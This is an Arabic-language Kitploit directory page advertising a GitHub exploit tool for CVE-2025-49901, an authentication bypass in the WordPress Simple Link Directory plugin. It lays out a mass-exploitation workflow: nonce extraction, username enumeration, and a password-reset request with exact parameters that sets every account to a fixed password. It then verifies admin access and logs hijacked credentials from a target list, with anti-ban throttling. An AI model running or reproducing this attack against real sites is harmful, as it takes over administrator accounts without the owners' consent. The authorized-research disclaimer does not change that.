Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49901 — البرنامج الإضافي Simple Link Directory لـ WordPress < 14.8.1 معرض لثغرة كسر المصادقة ذات أولوية عالية | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-49901
المصادقة والترخيصالاستطلاعهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubnxploited/cve-2025-49901

CVE-2025-49901

البرنامج الإضافي Simple Link Directory لـ WordPress < 14.8.1 معرض لثغرة كسر المصادقة ذات أولوية عالية

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-49901

المكوّن الإضافي ووردبريس Simple Link Directory الإصدار < 14.8.1 عرضة لثغرة كسر مصادقة عالية الأولوية.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           Authentication Bypass → Password Reset → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ الثغرة

نموذج إعادة تعيين كلمة المرور qc-opd المعروض على صفحات SLD يقبل اسم المستخدم وكلمة مرور جديدة دون التحقق من هوية المستخدم عبر أي رمز (token) أو تأكيد بالبريد الإلكتروني أو فحص صلاحيات. يمكن لمهاجم غير مصادق تعداد أسماء مستخدمي WordPress، وإرسال نموذج إعادة التعيين لأي حساب، ثم تسجيل الدخول فورًا بكلمة المرور المحقونة — مما يمنحه وصولًا بصلاحيات مسؤول دون أي تفاعل من المستخدم المستهدف.


▸ سير الهجوم

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                               │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form  │
│                                                         │
│  2. Extract nonce                                       │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce        │
│                                                         │
│  3. Enumerate usernames                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reset password for each username                    │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verify access (dual mode)                           │
│     Session mode  → cookie check + /wp-admin/ probes    │
│     Password mode → wp-login.php + admin panel check    │
│                                                         │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ الإعداد

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ الاستخدام

root@kitploit:~
Targets list file          →  list.txt  (one host per line)
Threads                    →  default 5
HTTP timeout               →  default 10s
Per-user delay MIN/MAX     →  anti-ban throttle  (default 0.3 / 0.7s)
Delay between sites        →  default 1.0s
Output file                →  scan_results/reset_mass_success.txt

صيغة الأهداف:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

كلمة المرور الثابتة المحقونة في جميع عمليات إعادة التعيين:

root@kitploit:~
newhackerpass123

▸ مصادر تعداد أسماء المستخدمين

الطريقةنقطة النهاية
إعادة توجيه المؤلف/?author=1 →

▸ منطق التحقق من المسؤول

بعد كل محاولة إعادة تعيين، تتحقق الأداة من الوصول باستخدام طريقتين مستقلتين:

root@kitploit:~
Session mode   →  checks wordpress_logged_in cookie + /wp-admin/ indicators
Password mode  →  full wp-login.php POST + multi-path admin panel probe

مؤشرات المسؤول التي يتم فحصها:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ تنسيق مخرجات الطرفية

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ ملف الإخراج

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ المؤلف

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ إخلاء مسؤولية

root@kitploit:~
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.

The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.

Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.

© 2025 Nxploited · Simple Link Directory < 14.8.1 · Fixed in 14.8.1

تنزيل الأداة
CVECVE-2025-49901
CVSS9.8 حرجة — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
المكوّن الإضافيquantumcloud Simple Link Directory (qc-simple-link-directory)
المتأثرجميع الإصدارات < 14.8.1
المصادقةغير مطلوبة
النوعتجاوز المصادقة عبر مسار بديل (CWE-288)
CWECWE-288 · تجاوز المصادقة باستخدام مسار أو قناة بديلة
/?author=10
REST API/wp-json/wp/v2/users
اسم المضيفالتسمية الأولى من النطاق كخيار احتياطي
مُرمّز ثابتadmin مُدرج دائمًا